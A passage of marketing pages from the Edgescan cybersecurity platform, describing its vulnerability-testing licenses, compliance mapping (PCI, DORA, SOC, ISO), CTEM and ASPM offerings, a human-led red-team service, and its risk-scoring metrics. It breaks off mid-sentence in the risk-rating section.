# Edgescan > Cybersecurity Platform ## Pages ### Edgescan Platform Licenses Licenses for Edgescan Solutions The Platform that gives you continuous security testing, validated risk and proven exploits that will 100% improve your exposure management program. Unauthenticated DAST Edgescan Essentials License Details × Edgescan EssentialsDesigned for scalable security coverage, Essentials gives you a clear picture of your external risk posture—without the noise.100% validated vulnerability results—no false positivesIncludes Network Vulnerability Management (NVM) for host-level visibilityUnlimited automated DAST assessmentsContinuous API discoveryReporting tailored by audience or scheduleAccess to Edgescan’s AI Insights for real-time remediation guidanceIntegrates easily with third-party systems and developer workflowsRisk-based prioritization using CVSS, Edgescan Validated Security Score (EVSS), and Exposure Factor (EXF) LEARN MORE Authenticated DAST Edgescan Professional License Details × Edgescan ProfessionalEdgescan Professional expands on the Essentials tier with authenticated DAST capabilities—allowing for deeper testing of session-aware, user-specific, and API-driven environments. It delivers comprehensive visibility across your dynamic applications, validated results, and prioritized remediation guidance, all via the Edgescan Platform.All features from the Essentials License, plus:Authenticated Dynamic Application Security Testing (DAST)Deeper testing coverage for applications behind login or session layers LEARN MORE PTaaS Edgescan Advanced License Details × Edgescan AdvancedEdgescan’s Advanced/PTaaS License delivers deep, human-led assessments of your most complex applications—focusing on business logic flaws, authenticated attack vectors, and advanced threats that automation alone cannot detect. Vulnerabilities are prioritized with risk-based scoring and mapped to actionable remediation guidance, all delivered through the Edgescan Platform for continuous visibility, unlimited retesting, and enterprise-scale coverage.Includes all capabilities from the Professional License, plus enhanced manual testing and expert validationAuthenticated application penetration testing (PTaaS), including business logic assessments (BLA)Manual testing performed by full-time Edgescan security experts (OSCP, CREST-certified)API Discovery and coverage across web apps, APIs, network infrastructure, and cloud environmentsIntegration with third-party tools, threat intelligence feeds (CISA KEV, EPSS), and AI-powered remediation insightsTailored reporting by audience or scheduleUnlimited retesting on demand LEARN MORE Network Vulnerability Management Edgescan Host/Server License Details × Edgescan Host/ServerEdgescan’s Host/Server NVM License delivers continuous, accurate vulnerability assessment across your internal and external infrastructure. Combining automated scanning with expert validation, the platform helps teams detect, prioritize, and remediate real risks—minimizing false positives and accelerating time-to-fix.Continuous vulnerability scanning across internal networks, servers, and infrastructure100% validated results—no false positivesDetection of missing patches, misconfigurations, and known CVEs (per NIST NVD)API discovery and VoIP/infrastructure scanning across diverse environmentsRisk-based prioritization using CVSS, EVSS, and EXF scoringRetesting on demand and customizable stakeholder reportingSeamless integrations with third-party tools via APIOption to upgrade to Edgescan Advanced/PTaaS License for deeper manual testingSupported by CREST-certified experts with real-time AI-driven remediation insights LEARN MORE MAST Mobile Application Security Testing License Details × Mobile Application Security Testing (MAST)Edgescan MAST delivers comprehensive security testing for mobile applications by combining native device testing, forensic analysis, and API-level penetration testing—all performed by CREST- and OSCP-certified experts. Designed to secure both the application and its backend infrastructure, this service provides validated results, continuous risk context, and unlimited retesting via the Edgescan Platform.Native mobile app testing for iOS and Android devicesForensic analysis of mobile device behavior and vulnerabilitiesManual penetration testing of the mobile application’s backendAPI (Advanced license included)Includes unlimited DAST assessments and Network Vulnerability Management (NVM) for API and hosting infrastructureContinuous API discovery and threat feed enrichment (CISA KEV, EPSS)100% validated results with risk-based scoring (CVSS, EVSS, EXF)Unlimited retesting and customizable stakeholder reportingSeamless integrations via API and third-party system supportDelivered by full-time certified security professionals LEARN MORE All core licenses include:​ 100% vulnerability validation – no false positives Unlimited automated assessments (network scans and DAST (Application and/or API)) Unlimited retesting of vulnerabilities Expert remediation guidance Premium support from FTE security (OSCP/CREST) experts Prebuilt and custom RESTful API Integrations Unlimited role-based user accounts Unlimited, on-demand, customized reporting CISA KEV and EPSS correlation of applicable vulnerabilities Additional Services and Add-ons Attack Surface Management (ASM) Discovery of all internet-facing assets associated to a domain, and continuous monitoring of defined external IP range(s) Internet discovery for a primary domain including, but not limited to, subdomains, internet records, registrants, and services. Continuously assesses and alerts users about network changes and APIs discovered in their defined external attack surface. PCI ASV Payment Card Industry-Approved Scanning Vendor Service Approved Scanning Vendor service to satisfy PCI-DSS compliance needs pertaining to vulnerability scanning, penetration testing, and reporting. 24x7x365 Support If access to 24/7 emergency escalations or premium support is required outside of traditional business hours, Edgescan can accommodate. Technical Account Manager (TAM) Dedicated account concierge who assists in achieving operational readiness across the enterprise. Edgescan is easy to set up and maintain out of the box; however, a Technical Account Manager is often recommended for teams that need to improve their security posture quickly, are going through a digital transformation effort, are short-staffed, or have particularly complex environments. All Edgescan licenses include continuous vulnerability assessment with unlimited automated scans, risk prioritization, validated results, access to our analytics dashboard, and remediation guidance. Manual penetration testing, mobile application assessments, and authenticated testing can be added based on your risk tolerance and compliance needs. Pricing adjusts dynamically with the scope of coverage—applications, APIs, and IPs—and the level of testing rigor required. Volume discounts and multi-year pricing options are available. For a tailored quote or to explore the right configuration for your organization, please contact our team. Types of Assets Discovered and Protected by the Edgescan Platform Application Examples Web applications (authenticated and unauthenticated), API’s (JSON, XML, WSDL, YAML and Graph), microservice architecture, single page applications, mobile applications. Network Asset Examples Servers, routers, switches, firewalls, domain controllers, data center, desktops (any layer 2 and layer 3 devices), printers, cloud assets, container hostnames, IOT and anything that has an IP address which is visible to Edgescan. Single IP’s, hostnames, blocks, CIDR and IPV6 are all supported.  Integrations All tiers of Edgescan come with our full suite of integrations, click here to review the list. Click Here Contextualized Risk Scoring Risk prioritization with traditional and proprietary (EXF) scoring systems. CLICK HERE Certified Security Professionals Edgescan Security Experts (OSCP/CREST) are FTEs able to provide consultancy-grade penetration tests and Business Logic Assessments (BLAs) (PTaaS) to critical assets. CLICK HERE Vulnerabilities Discovered by Edgescan Our hybrid process of advanced scanning automation and cyber analytics combined with human intelligence is what differentiates us from scanning tools and traditional pen testing services. All OWASP Top 10 vulnerabilities Application framework – known vulnerabilities (spring / struts / zend/ django/ .net, etc.) Autocomplete attribute Buffer overflow Content spoofing / HTML hacking Cookie access control Cross site scripting (XSS) –reflected / stored Data / information leakage Directory indexing DOM XSS File path traversal HTTP caching control HTTP header injection HTTP only session cookie HTTP response smuggling HTTP response splitting / pollution Improper input handling Improper output encoding / content type encoding Improper file system access control Insufficient SSL / TLS / transport layer protection Integer overflows LDAP injection OS command injection Persistent session cookie Remote file inclusion (RFI) SANS Top 25 Software Errors Server-side injection SQL injection: error based, time based, Boolean conditional, MySQL, MSSQL, Oracle, etc. Unsecured session cookie URL redirect security XML attribute security, XML external entities XML injection and schema security XPath injection ### DevSecOps DevSecOps With the pace of today’s development cycles, it’s imperative to build security into your stack from the ground up. Edgescan seamlessly integrates with all major CI/CD pipelines while delivering clever technology to produce validated vulnerability intelligence that's virtually free of false positives.With a unified approach that fosters cross-functional collaboration and threat intelligence that’s straightforward and accessible, teams across your organization will be on the same page as they come together to maintain a robust security posture in a threat environment that’s constantly evolving.Safe Sprinting The days are long gone when an organization’s security team could get involved at the end of a development cycle. The modern sprint model requires that teams incorporate security into the process from day one. The goal for any organization is to operate at speed and scale without sacrificing security. That’s next to impossible without highly accurate and timely security assessments, and that’s a fair summary of what Edgescan is all about. With continuous vulnerability scanning and penetration testing, the Edgescan platform powers a unified approach to vulnerability management that creates a single source of truth across your development and security teams. Validation, Validation, Validation Edgescan ensures vulnerabilities presented in the platform are real through a combination of auto-validation based in clever use of data science and expert validation where required. For vulnerabilities that can't be auto-validated (about 8%), our experts triage and confirm the discovered vulnerability is truly real. The solution is powered by advanced analytics drawing on millions of past vulnerability examples from the vast Edgescan data lake. Potential threats are assessed against this trove of intelligence, gathered across a decade of service to a wide variety of clients, to immediately root out false positives. But that’s just the first phase in a multi-step validation process. Flagged vulnerabilities deemed to require additional inspection are placed into the expert validation pipeline, where Edgescan’s OSCP- and CREST-certified experts—a group of seasoned penetration testers who have been with the firm an average of seven years—probe them to verify the threats and map their characteristics. With the breadth of automation and the depth of human expertise, you can have absolute confidence that your assessments are both comprehensive and false-positive-free. That way, your security team won’t waste time on issues that pose no real danger, and your development team won’t be served with a list of unimportant issues to address as they’re building out a new layer of the stack. They can fix significant problems fast and keep moving. Complete Integration The Edgescan API integrates with all major CI/CD pipelines, so the security team can feed information straight into an interface shared with developers. Now multiple working groups in the DevSecOps equation are looking at the same intelligence and the same data. They’re on the same page. They can alert one another within the platform and push some issues as priorities for review or remediation. The solution scans new and existing code blocks on a schedule matched to the internal development team’s sprint cycles. The output reports are shared with the team so they can begin remediation while the development process continues for optimal efficiency. That’s development at speed and scale, without sacrificing security. That’s DevSecOps. Build a Holistic Model DevSecOps is an ethos for an entire organization, one that encourages members of every team to approach their work with information security in mind. It’s a collaborative view of security across the board, where everyone is responsible for maintaining a robust security posture. Vital to this mission is intelligence that’s accessible to all team members, regardless of their specialization or level of expertise. At Edgescan, we believe full-stack vulnerability intelligence should operate via plain language that everyone can understand, and the platform combines multiple views of the same problem to create a true DevSecOps framework. Continuous Support If you have questions about a vulnerability identified on an assessment, our team of seasoned penetration testers is on hand to provide technical background and guide your remediation process to ensure a security gap is fully closed. Our team of experts are also available to help you design your DevSecOps strategy from a global perspective to maximize the efficiency and resiliency of your process. Looking across your organization, they can also help different teams with different views of the same problem understand the same issue in their own ways. Whether you know what’s missing from your organization's approach to secure development or you’re still figuring that out, the Edgescan solution isn’t a tool. In aggregate, this is a platform and a service that will change the shape of your organization’s approach through ongoing partnership. ### Mergers and Acquisitions Mergers and Acquisitions When a firm’s strategy rests on acquiring other enterprises—and their digital assets—it’s crucial to develop a strategic process for safely welcoming those assets and data into the cyber estate following a transaction. Edgescan will partner with your security team to build and execute that process.Build Your FortressNo matter your business strategy, the first step for any organization large or small is to establish a robust security posture across your current digital estate.The Edgescan platform is purpose-built to provide your internal security team with a comprehensive view of the attack surface, identify and flag vulnerabilities, and guide your team through the remediation process with validated, risk-rated vulnerability assessments so your team can tackle the most pressing issues first.The Acquisition ChallengeMergers and acquisitions present continuous challenges for a firm’s internal security team. “Cybersecurity concerns are high for all M&A transactions, especially in due diligence,” Gartner reports. “The implications of incomplete or inaccurate due diligence can be catastrophic.”How can your security team get a comprehensive view of the IT assets associated with an outside enterprise, particularly if they do not get the opportunity to perform full due diligence before acquisition? With a limited time window before new assets must be assimilated into the cyber estate, it’s not always realistic to identify and profile all of the disparate assets to get visibility into their risk controls.That’s where Edgescan comes in.Secure GrowthOnce a fortified perimeter is established around your existing digital infrastructure, Edgescan will be your partner in safely welcoming new assets into the fold.When an Edgescan client moves to make an acquisition, the platform seamlessly onboards all assets associated with the target company—websites, mobile applications, network infrastructure, and more—and begins the program of continuous Attack Surface Management (ASM) to discover and profile new assets before they enter the network.The acquired landscape, assets, and systems are scrutinized for vulnerabilities as they're accepted into the acquiring firm’s cyber estate in order to maintain the client’s overall security posture.Validated VulnerabilitiesEvery potential vulnerability flagged in the Edgescan dashboard is automatically assessed and validated using the platform’s vast data lake. When required, some discovered exposures are validated by a team of CREST- and OSCP-certified analysts, creating a multi-step authentication process that virtually guarantees your vulnerability assessment results will be free of false positives.End-to-End IntegrationWith the Edgescan dashboard, the assessment process for new assets can be streamlined and automated into your existing security protocols. Your catalog of vulnerabilities, recommendations for how to fix them, and guidance on what should be a priority will be continually updated to offer a comprehensive view of your organization’s attack surface as it grows and evolves.World-Class SupportThe same team of experts who validate your vulnerabilities are also on-hand (and on-demand) whenever you contact Edgescan support to offer next-level insight on your security gaps and advise you on how to close them. They can guide your decision-making and help you design a consistent process for discovering, profiling, and accepting new assets into your digital estate following an acquisition.Strength Through ConsistencyThat process is key: a defined and standardized procedure, repeatable and reliable in a wide variety of business contexts, is essential to growing safely. For enterprises specializing in mergers and acquisitions, penetration testing all applications, APIs, and network infrastructure following an acquisition is next to impossible, and the sheer scale of the overall task can be daunting for teams with finite resources and limited specialization.Partnering with Edgescan will directly serve the major strategic goals of your business and allow leadership to execute a plan at the global level while the security team maintains full command of the security posture across the attack surface. Elevate new assets to meet your security standards and grow with strength in a competitive landscape. ### Compliance DORA, PCI-DSS, CISA, CIS, PSD2, SOC, ISO, NIST, and the FTC’s Safeguards Rule Compliance The Edgescan platform is purpose-built to bring your organization into complete alignment with all industry and government regulatory standards, then exceed them.“As more nations enforce privacy and data protection and localization requirements,” Gartner reports, “forward-thinking organizations must rethink their compliance processes” to reflect new privacy and data-protection benchmarks.Edgescan provides PCI-DSS, CISA, CIS compliance mapping, and the platform’s AI Insights feature will map discovered vulnerabilities to compliance standards in order to frame how the vulnerability will impact compliance efforts. When you achieve a comprehensive view of the attack surface and continually identify vulnerabilities with Edgescan before they’re exploited by malign actors, you build a security posture where compliance is just the baseline.PCI-Approved The Payment Card Industry Security Standards Council (PCI SSC) designates Approved Scanning Vendors (ASV) that are fully equipped to conduct external vulnerability scanning services for firms that process payments online. Scanning is the core PCI requirement, but the list of advisories has also grown in recent years to include an Annual Penetration Test and Verification of Remediation. The Edgescan platform will equip your internal security team to tackle all provisions of the PCI DSS standard. Exceed E.U. Standards The European Union has issued a set of rules for firms processing online payments known as the revised Payment Services Directive (PSD2), an update to the original framework instituted in 2007. The PSD2 is a collection of technical regulatory standards that guide firms towards developing strong customer authentication protocols, and there are also guidelines for incident reporting and full and proper remediation. The Digital Operational Resilience Act (DORA) is the new standard for information security among European financial institutions—particularly those regulated by central banks—and introduces rules around incident management and reporting, digital testing, and management of third-party risk. It also applies to third-party vendors providing Information and Communications Technology (ICT) services to financial institutions, including cloud platforms or data analytics. Financial entities are required to define, document, and maintain a comprehensive digital operational resilience testing program that includes vulnerability scanning and penetration tests. With continuous vulnerability scanning, regular penetration testing, and remediation guidance, the Edgescan platform is built to partner with your security team as they clear all applicable European standards. FTC-Ready In the United States, the FTC’s Standards for Safeguarding Customer Information (the Safeguards Rule) applies to financial institutions like “mortgage lenders, payday lenders, finance companies, mortgage brokers, account servicers, check cashers, wire transferors, collection agencies, credit counselors and other financial advisors, tax preparation firms, non-federally insured credit unions, and [some] investment advisors.” These organizations are required to develop, implement, and maintain an information security program that adequately protects customers’ personal and financial information. The Edgescan platform is well-placed to serve your team as they drive your organization to meet and exceed FTC standards. Next-Level Data Security The System and Organizational Controls (SOC) 2 framework evaluates how organizations manage their systems and customer data. It’s designed with cloud providers and software-as-a-service (SaaS) vendors in mind, and it’s based on five key criteria: security, availability, processing integrity, privacy, and confidentiality. Edgescan will partner with your security team to develop a data-security program that exceeds SOC standards, and the platform will identify security gaps where unauthorized access could lead to data leaks, compromised information, and bad headlines. See the Full Threat Matrix You can tap the Edgescan platform to aid your security team in meeting ISO / IEC 27001 / 27002 guidelines by developing information-security controls with a healthy focus on how they fit within the overall risk environment. What are the patterns of attack currently favored by bad actors targeting other firms in your industry? Are they zeroing in on rogue APIs, or some other region of the attack surface? And what are the most up-to-date methods to counter your adversaries in the constantly evolving cyber arms race? Edgescan will provide you with cutting-edge intelligence to answer these questions so you'll clear ISO guidelines with room to spare. Validated Vulnerabilities Every vulnerability flagged in the Edgescan dashboard has been automatically assessed and validated against the platform’s vast data lake using clever technology and data science. Complex vulnerabilities, exposures and threats are validated by a team of CREST and OSCP certified Penetration testers—a group of seasoned penetration testers who have been with the firm an average of seven years when automation is not rigorous enough—creating a multi-step validation process that virtually guarantees a list of vulnerabilities that’s free of false positives. Don’t waste time investigating bogus threats that pose no threat to your systems and will not affect your compliance goals. When you see it in Edgescan, you know it’s real. ### CTEM Continuous Threat and Exposure Management (CTEM) Edgescan was delivering Continuous Threat and Exposure Management for years before Gartner coined the term in 2022. Vulnerability detection, validation, and prioritization, plus Penetration Testing as a Service (PTaaS) and Attack Surface Management (ASM): Edgescan has been in the business of CTEM since before CTEM.Scope your exposure and improve your security posture with a continuous, adaptable, and cost-effective solution that covers a broad range of networks, endpoints, and cloud environments across your organization’s security landscape.That’s how you stay secure as the threat matrix constantly evolves and your web-facing infrastructure grows: by continuously monitoring, assessing, prioritizing, and resolving security issues on a platform that powers an integrated and holistic approach to vulnerability management.Constant Vigilance, No SurprisesEdgescan delivers continuous monitoring and real-time intelligence to security teams at some of the largest companies in the world, helping them to map their attack surfaces, identify vulnerabilities, validate those threats and root out false positives. The Edgescan platform is also built to guide and track the remediation process and ensure security gaps are truly closed.This is continuous vulnerability management at the highest level, and with a human element: Edgescan’s team of CREST and OSCP-certified experts not only conducts hundreds of pentests and thousands of assessments per month. They’re also on-hand to answer questions and guide your remediation process any time you call the support desk.This isn’t a tool, its service, and it’s always on. You won’t be caught off-guard by an unexpected vulnerability that pops up on an annual pentest, because you’ll catch vulnerabilities and fix them well before then. That’s how you develop a security posture wherein serious threats are continuously addressed before they’re exploited by malign actors. That's why industry analysts have found that organizations using CTEM report a 30% drop in cyber incidents.Reduce Your Mean Time to Remediate (MTTR)If you operate on an annual pentest model, you’re not on a level playing field with threats agent and cyber criminals. It’s a point-in-time assessment, and as the landscape changes, your window of exposure grows. With CTEM, you’re continuously served in-depth intelligence on what and where your vulnerabilities are and how to fix them. All discovered threats and exposures are risk-rated and prioritized in the Edgescan dashboard so your security team can understand the risks and address the most pressing issues first, before they become a problem for your organization.With comprehensive vision across the attack surface and smart insights into how to address vulnerabilities as they’re identified, Edgescan clients have seen a reduction in remediation time of up to 55%.Adaptable and Dynamic Threat DetectionAnnual penetration testing provides you with a snapshot of your network infrastructure (and the vulnerabilities lurking therein) that is accurate at the time—but static. Today’s threat matrix is constantly evolving. Malign actors escalate and adapt their methods while your organization continually grows its digital assets as the enterprise evolves. Change gives rise to risk—as the landscape changes, threats evolve. CTEM is designed to help you stay two steps ahead.With CTEM, you’re constantly mapping and re-mapping the ever-changing landscape. It’s like a GPS, and with validation and prioritization, it’s always pointing you towards the most efficient route to your destination: a robust security posture that turns your organization’s digital estate into a fortress.Reduce Costs and Consolidate Your BudgetsIn a vacuum, it might seem cost-effective to just put your resources towards testing on an annual basis or whatever’s required by the regulatory framework in your space. But ultimately, this kind of reactive model can prove more resource-intensive than a CTEM model where you constantly monitor the attack surface and close security gaps as they open up.Continuous vulnerability management is keeping your house clean rather than waiting until things get bad to clean it all up, and it saves money. Some enterprises have reduced their overall security costs by up to 50% by implementing CTEM, all while dramatically improving their security postures., ### ASPM Application Security Posture Management (ASPM) The security of web-facing and internal applications is a core priority for any organization. The Edgescan platform performs continuous vulnerability assessments of applications throughout the software development lifecycle, validating potential vulnerabilities to eliminate false positives and guiding the remediation process.Edgescan partners with security teams at both SMBs and some of the largest companies in the world to monitor applications across their digital estates according to the core principles of Application Security Posture Management (ASPM).Leveraging AI (“AI Insights”) to map your exposures and align your posture to compliance standards, ransomware resilience, preventative security, and training based on real-time analysis of your vulnerability data provides a compelling security posture management solution. Get a comprehensive view of the attack surface Any ASPM service should offer an organization’s security team up-to-date intelligence on the number and severity of vulnerabilities. The Edgescan platform rises above that baseline with continuous vulnerability assessments that combine the breadth of clever automation and data science with the depth of human expertise for a best-in-class service. Every vulnerability identified on an Edgescan assessment is automatically evaluated against a vast data lake to assess whether it poses a real and pressing threat to your organization. If required, depending on the exposure type, a team of OCSP- and CREST-certified experts—seasoned penetration testers who have been with Edgescan an average of seven years—get involved to create a multi-step validation process for a solution that is virtually free of false positives. Edgescan offers your security team detailed guidance on how to approach the remediation process for a particular vulnerability, and those same penetration testers are on-hand when you contact support to offer insight and recommendations to inform your approach. Our AI Insights feature also maps vulnerabilities against a variety of compliance standards, flags ransomware exploitation risks, highlights Exposure anomalies, and even suggests focus areas for training and preventative security. Know your priorities The first question is, “What do I fix?” The next is, “What do I fix first?” The catalog of validated vulnerabilities continually delivered to your security team is risk-rated, with a range of metrics indicating the threats that should be top priorities for remediation. Edgescan provides a number of risk scores—EPSS, CISA KEV, CVSS, and the proprietary EXF—so your internal team can make efficient decisions to quickly and dramatically improve your risk profile. Secure from the ground up The days are long gone when an organization’s security team could get involved at the end of a development cycle. The contemporary sprint model demands a comprehensive and continuous vulnerability management approach, one that teams can incorporate into their Software Development Life Cycle (SDLC) from day one. Edgescan seamlessly integrates with all major CI/CD, Ticketing and Vulnerability management platforms and pipelines, so the security team can feed information straight into an interface shared with developers. The goal for any organization is to operate at speed and scale without sacrificing safety and security, and Edgescan is designed to help build security into your development process through DevSecOps. Eliminate the threat, fast A priority metric for any security team is mean time to remediation (MTTR), which gauges how long it takes to address vulnerabilities. It’s core to the firm’s security posture: You find potential threats in order to close gaps in your armor that can be exploited by malign actors. With the Edgescan platform’s validated vulnerabilities, you aren’t wasting your time on false positives, and prioritization. The solution points you towards the areas of priority, compliance issues and even training requirements using our AI Insights feature. You’ll get all the intelligence you need all in one interface. Meet and exceed compliance Your first duty as a member of the cybersecurity team is to meet compliance standards in your industry or space. Whether it’s the PCI, CISA, CISPCI, SOC, ISO, or the European Union’s Payment Services Directive (PSD2), the Edgescan platform gives you all the tools to bring your security posture in line with these standards and exceed them with industry-leading Attack Surface Management (ASM) and Penetration Testing as a Service (PTaaS). The Edgescan dashboard will advise you on your progress against key metrics, mapping discovered vulnerabilities to compliance standards leveraging our AI-based advisory which performs ongoing analysis of your security posture. You can rely on continually updating metrics and intelligence to monitor each application’s overall security posture and whether it meets the standards of your regulatory framework. ### DORA / Red-Teaming DORA / Red-Teaming In the European Union, the Digital Operational Resilience Act (DORA) is the new standard for information security among financial institutions and introduces rules around incident management and reporting, digital testing, and management of third-party risk.With the Edgescan Red Team service, a specialized group of certified security professionals will help bring your firm in compliance with DORA (and other aligning standards like TIBER-EU) by emulating adversarial tactics to identify, exploit, and report vulnerabilities in your systems.Red Teaming is typically combined with the continuous testing and exposure management approach Edgescan traditionally delivers to provide both deep threat-based assessments and validated full-stack assessments on demand.What is DORA? From January 2025, the Digital Operational Resilience Act (DORA) governs information security for financial institutions that do business in the European Union, particularly those regulated by central banks. That includes commercial banks, insurance companies, investment firms, and more. DORA ensures that the E.U. financial sector can withstand, respond to, and recover from Information and Communications Technology (ICT)-related disruptions and cyberattacks. New rules around incident management and reporting, digital testing, and management of third-party risk are designed to guide financial firms in building robust security postures in the face of a threat matrix that’s constantly evolving. The requirements also apply to third-party vendors providing ICT services to financial institutions, including cloud platforms or data analytics. Financial entities and their vendors are required to define, document, and maintain a comprehensive digital operational resilience testing program that includes vulnerability scanning and penetration tests, plus Red-Teaming and Threat-Led Penetration Testing (TLPT). The Red Team With Edgescan, your internal security team can partner with a specialized group of security professionals who hold a range of certifications through leading organizations such as Offensive Security, CREST, Altered Security, EC-Council and more, ensuring the highest level of expertise and professionalism in every engagement. These experts are trained in adversarial Tactics, Techniques, and Procedures (TTP) to identify and exploit vulnerabilities, alerting Edgescan clients to potential vulnerabilities in their systems by simulating real-world cyber attacks. The Edgescan Red Team might use social engineering tactics to assess employee security awareness, conduct wireless assessments to evaluate network vulnerabilities, or attempt to infiltrate the environment, navigate through systems, escalate access, and simulate the potential impact of a real-world attack on your organization. This approach aligns with Threat-Led Penetration Testing (TLPT), ensuring that testing scenarios reflect realistic threats and tactics used by adversaries. Red-Teaming: How it Works The Edgescan DifferenceEdgescan’s Red Teams will engage your security systems over an extended timespan, looking at all available means to breach and exploit.They’ll go well beyond the commercial, open-source, and proprietary scanning tools that form the basis of many vulnerability assessments, enlisting a varied arsenal of assessments to test the mettle of your security team and the posture they’ve built to safeguard your customers’ data and sensitive information.Your staff won’t be aware of when and where a simulated attack will take place, adding an extra layer of realism. All your systems will be tested together, and the focus area will be fluid, dynamic, and wide-ranging.This comprehensive approach will also satisfy Threat Intelligence-based Ethical Red Teaming (TIBER-EU) requirements, which align with DORA. Using threat intelligence to tailor testing, Edgescan’s ethical Red Teams can gauge the specific risk profile of your organization and mimic adversarial tactics to put your systems to the test. Download the data sheet ### Seamless Integrations Seamless Integrations Seamlessly integrate alerts and notifications with your installed third-party systems for complete visibility across your tool stack. Integrate Your Core Solutions Businesses today depend on a range of different solutions to coordinate their operations within individual units or across their organization—tools for communication, workflow, asset management, webhooks, and more. Edgescan’s continuous security testing and exposure management SaaS platform seamlessly integrates into your operational ecosystem, working in harmony with leading technology solutions using an API-first approach that will enhance your overall security posture while safely enabling your existing continuous integration (CI), continuous delivery (CD), and DevOps tools. Here are some major solutions that the Edgescan platform will enable you to operate without endangering your attack surface or your operational efficiency:  Full visibility across your public cloud The Cloudhook integration automatically onboards locations present in various cloud environments into the Edgescan platform, giving full visibility across your public cloud. Learn More Download the Integrations datasheet. DOWNLOAD THE DATASHEET ### Support End-to-End Support From activation to validation to remediation and beyond, our team of CREST- and OSCP-certified experts will partner with your internal security staff to strengthen your security posture across the full stack. ActivationWhen you enlist Edgescan’s continuous security testing and exposure management SaaS platform, a member of our team will organize a training for you and your staff to familiarize you with the platform’s offerings as well as the new base of operations for your internal security team: the Edgescan dashboard.This will typically mean a 30-minute hands-on session to get you familiar with the platform and its capabilities: scanning and penetration testing to identify vulnerabilities, plus validation, remediation, and verification to ensure they’ve been resolved.Trusted ValidationAll vulnerabilities identified during an Edgescan assessment are automatically validated against the vast trove of insights in the Edgescan data lake.But when a flagged vulnerability is unfit for automatic validation, it’s placed into the expert validation process. Complex vulnerabilities, less-common issues, and those of potentially major severity will generally undergo expert validation.Edgescan experts are seasoned penetration testers who deliver pentesting fieldwork and Penetration Testing as a Service (PTaaS) on a daily basis. They are OSCP- and CREST-certified, and use both widely available techniques and others proprietary to Edgescan to probe your web-facing applications, APIs, host network, and more. This second layer of confirmation results in super-accurate vulnerability intelligence, and you can have absolute confidence that your vulnerability assessments will be both comprehensive and false-positive-free.But you can also contact Edgescan at any time and ask to speak with a dedicated penetration tester about a specific vulnerability around which you have outstanding questions, to explore patterns in your vulnerability data, or to understand how a particular security gap fits in the context of your overall network and web-facing architecture.Guided RemediationOnce your list of validated vulnerabilities is compiled in the Edgescan dashboard, they’ll be laid out against a number of different metrics that you can use to prioritize them for assignment and remediation beginning with the most critical threats. This risk-rated approach will help you save time and money while delivering high-impact results that significantly elevate your security posture.But the Edgescan support team will also be with you all along the way, on-call to offer human expertise on your remediation process that will buttress the sprawling data-powered insights of the Edgescan dashboard. If you’ve got a question on the threat level of a specific vulnerability, or how it relates to the others you’re targeting, you can ask a certified pentester to break things down for your team.Once an identified vulnerability has cleared your remediation pipeline, you can mark it as addressed in the Edgescan dashboard by initiating a retest, at which point our experts will circle back around to verify the security gap has been fully resolved and no longer poses a significant problem for your organization.Problem-Focused Training In addition to the training your team will receive during onboarding, established clients can contact their Edgescan Customer Success Manager (CSM) at any time to organize further primers on using the tools and services on offer to maximize the impact of the Edgescan platform on their information-security approach. In this context, sessions are typically problem-based rather than high-level overviews, designed to address specific shortfalls in understanding and implementation at one or more stages of the vulnerability-management process. No matter the mission, the expert support team at Edgescan is on hand to ensure you are fully enabled on the platform and best equipped to strengthen your security posture in every dimension across the full stack. Download the Support datasheet. DOWNLOAD THE DATASHEET ### Risk Rating Risk Rated Let’s secure what matters, starting with what matters most. This is prioritized threat intelligence with a human touch. What Do I Fix?With Edgescan’s hybrid validation approach, you’ll get a list of vulnerabilities across your full stack that’s virtually free of false positives every single time.That’s efficiency: unlike scanners or other tools, our continuous security testing and unified exposure management SaaS platform won’t serve up an index of 1,100 potential vulnerabilities and leave you to figure out what’s what. You’ll get all the verified, active threats and nothing more.When Do I Fix It?But even once the real problems are separated from the rest—the signal in the noise—there’s a next question: “What should I fix first?”The answer will yield huge dividends for your information-security team and your business as a whole if you can find it quickly and consistently. With the right information about which threats to prioritize, you can dramatically improve the efficiency of your remediation process, delivering value back to your business in the form of time and money while strengthening your security posture.Edgescan consistently delivers those answers to organizations large and small with data-powered tool sets backed by the human element: on-demand support from CREST- and OSCP-certified experts.Risk-Rating From Every AngleOnce vulnerabilities are assessed across your web-facing assets, a list of them will be compiled in the Edgescan dashboard. That’s also where you’ll find an all-you-can-eat buffet of risk-prioritization tools to guide you through your remediation process:There’s the Common Vulnerability Scoring System (CVSS), the generalized scoring system which any vulnerability-management tool would need to provide.There’s the Cybersecurity & Infrastructure Security Agency’s Known Exploited Vulnerabilities catalog (CISA KEV), which speaks to whether the particular vulnerability in question has been exploited somewhere out in the wild today. This framework is constantly updated via API to pipe new common issues into the Edgescan dashboard as they’re identified.There’s the Exploit Prediction Scoring System (EPSS), which tells you how likely it is that a specific vulnerability will be exploited based on the prevailing trends and current landscape.And then there are Edgescan’s proprietary tools, including the Edgescan Validated Security System (EVSS), which serves up a bespoke score for each client that takes into account everything we know about their organization.That includes the systems architecture, how many layers of the stack we’re testing for them, any context around their network vulnerabilities that affects their application vulnerabilities, and which—if any—compensating controls they have in place.The internal security team can risk-accept vulnerabilities one by one and let us know why they made each decision. In the end, you’re left with a score customized to your organization, from critical all the way down to minimal.But then there’s the ultimate metric for your risk-rating process: the Edgescan eXposure Factor (EXF). The EXF Difference What if you could combine all of the resources above to dynamically generate breach probability data in the aggregate?The Edgescan eXposure Factor does just that, combining metadata from CVSS, EPSS, and CISA KEV to assess each discovered and validated vulnerability on a 0 to 100 scale, where a lower score indicates minimal risk and a higher one signifies greater vulnerability. It’s a single unified metric to gauge the degree of exposure and how menacing it may be in the context of your overall security posture.The Edgescan eXposure Factor is displayed to the user on the Vulnerabilities page of the Edgescan dashboard under the title EXF. It’s recalibrated daily via dynamic feeds from all the constituent sources to keep pace with exploitation intelligence in the wild and incorporate changes to your organization, your network, and your overall security posture.The Human ElementThe range of tools included in the Edgescan platform will deliver context around your vulnerabilities using vast data resources and proprietary analytical techniques.But the real power of Edgescan lies in backing all this mechanical might with the dexterity and depth of human intelligence. If you’re looking for further insight into a particular vulnerability, the Edgescan support team is on call to provide a guiding hand when making your remediation priority decisions.These CREST- and OSCP-certified experts are full-time Edgescan employees who’ve been with the firm an average of seven years, and you can request to speak with a licensed penetration tester at any time.This bespoke service enables us to meet our ultimate goal: to fit into and enhance your security program as it stands.Small Org. Big Org. Your ideal tool will vary according to your organization’s needs, but the Edgescan eXposure Factor (EXF) often proves particularly valuable to smaller organizations with internal security teams of commensurate size. Some may have a handful of employees, others just one, who are focused on information security. While these shops will 